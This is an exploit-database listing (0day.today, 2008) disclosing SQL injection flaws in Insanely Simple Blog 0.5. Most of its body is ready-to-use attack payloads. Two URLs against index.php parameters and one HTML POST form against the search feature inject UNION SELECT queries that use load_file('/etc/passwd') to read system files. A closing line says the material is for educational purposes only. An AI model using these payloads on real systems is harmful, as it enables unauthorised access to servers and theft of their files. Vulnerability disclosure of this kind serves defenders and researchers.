[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Insanely Simple Blog 0.5 (index) Remote SQL Injection Vulnerabilities

Author
Unohope
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3147
Category
web applications
Date add
09-06-2008
Platform
unsorted
=====================================================================
Insanely Simple Blog 0.5 (index) Remote SQL Injection Vulnerabilities
=====================================================================




  _____ _   _ _____  _____ _____ _____  
 /  ___| |_| |  _  \|  _  |  _  |_   _| 
 | (___|  _  | [_)_/| (_) | (_) | | |   
 \_____|_| |_|_| |_||_____|_____| |_|   
        C. H. R. O. O. T.  SECURITY  GROUP
        - -- ----- --- -- -- ---- --- -- - 
                    

                          _   _ _ _____ ____ ____ __  _ 
        Hacks In Taiwan  | |_| | |_   _|  __|    |  \| |
        Conference 2008  |  _  | | | | | (__| () |     |
                         |_| |_|_| |_| \____|____|_|\__|
                                   


Title =======:: Insanely Simple Blog 0.5 (index) Remote SQL Injection Vulnerabilities

ScriptName ==:: Insanely Simple Blog 

Download ====:: http://jaist.dl.sourceforge.net/sourceforge/insanelysimple2/insanely_simple_blog0.5.zip

______________________
[SQL Injection]

- {index.php} -

http://localhost/isblog/index.php?id=-99+union+select+0,1,2,3,4,5,6,load_file('/etc/passwd'),8/*

http://localhost/isblog/index.php?current_subsection=-99+union+select+0,1,2,3,4,5,6,load_file('/etc/passwd'),8/*

<form action="http://localhost/isblog/index.php?action=search" method="post">
<input type="hidden" name="term" value="-99' union select 0,1,2,3,4,5,6,load_file('/etc/passwd'),8/*">
<input type="submit" value="send">
</form>

______
[NOTE]

!! This is just for educational purposes, DO NOT use for illegal. !!



#  0day.today [2024-11-16]  #